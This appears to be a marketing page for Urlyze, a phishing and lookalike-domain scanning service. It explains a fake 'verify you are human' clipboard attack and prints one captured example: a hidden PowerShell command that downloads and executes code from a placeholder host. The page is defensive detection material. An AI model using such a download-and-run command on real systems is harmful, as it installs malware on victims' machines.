Know before you click.
Urlyze finds the lookalike domains, phishing sites, and BEC infrastructure targeting your brand — analyzes them with a real scanning engine, and hands you takedown-ready evidence.
Free · no signup needed for public scans
Credential-harvesting page impersonating a bank sign-in flow, served from a domain registered 2 days ago.
Analyst hint: form posts credentials to an unrelated .top domain — classic phishing-kit exfiltration.
~70,000newly registered domains screened daily
Every alert backed by a full forensic scan report
Private by default — your submissions are never public
How it works
Monitor. Analyze. Act.
Monitor
Your brand's lookalike space, ~70k new domain registrations a day, Telegram channels, and your own domains' email posture — watched continuously.
Analyze
Every candidate gets a real scan: headless browser rendering, multi-engine reputation, in-depth file and document analysis, phishing-kit fingerprinting — ending in a clear verdict with a plain-language explanation.
Act
Prioritized alerts, BEC-capable lookalike warnings, takedown evidence packs, IOC/STIX export to your SIEM, and built-in case management.
Platform
Four pillars, one evidence trail
Why Urlyze
Scanners give you data. Alert feeds give you noise. Urlyze gives you evidence.
Verdicts, not dumps
A raw DOM dump isn't an answer. Every Urlyze scan ends in a verdict — with the explanation and analyst hint that justify it.
Private by default
Public scanners publish what you submit. Urlyze never exposes your submissions or your identity. What you scan is your business.
Alerts you can open
Every brand-protection alert links to the full forensic scan behind it. Open it, verify it, export it — no black boxes.
The phishing site that doesn't exist yet
A lookalike domain with mail servers configured and no website is a BEC attack waiting to happen. Site-only scanners can't see it. Urlyze flags it the day it's registered.
- MXconfigured
- SPFpublished
- Websitenone
The attack with no download
The malware the victim installs themselves.
A page shows a fake “verify you are human” gate. Pressing it silently writes a shell command to the visitor's clipboard, and the page walks them through running it: Win+R, Ctrl+V, Enter. The victim executes the malware themselves.
There is no download, no form and no password field — so download-, form- and credential-shaped checks all score the page zero. Urlyze presses the gate on a throwaway copy of the page, records what it writes to the clipboard across every write path a browser offers, and captures both the command and a screenshot of the instruction screen that only appears after the click. It also catches pages that fetch their command-and-control address from a public blockchain node while presenting themselves as something unrelated to crypto.
A documentation page shows the command it copies. An attack can't. The hidden command is the finding — not the command itself.
What the visitor sees
- Press Win + R
- Press Ctrl + V
- Press Enter
No download. No form. No password field. Nothing a download-, form- or credential-shaped check looks for.
Clipboard write
powershell -w hidden -c "iex(irm 'https://updates.example/agent')"Captured by pressing the gate on a throwaway copy of the page — never the analysed document. A documentation page shows the command it copies; this one hid it.
Trust & privacy
Built to be trusted with what you scan
Submissions private by default
Credentials and secrets stripped at capture — never stored
Strict tenant isolation
Hosted in the EU
Served through Cloudflare's global edge
Urlyze — Scan Before You Click
Scan the page you're on — or any link on it — before you click, and get a verdict in plain language. The extension does not read your pages; it acts when you ask it to. Free, no signup needed.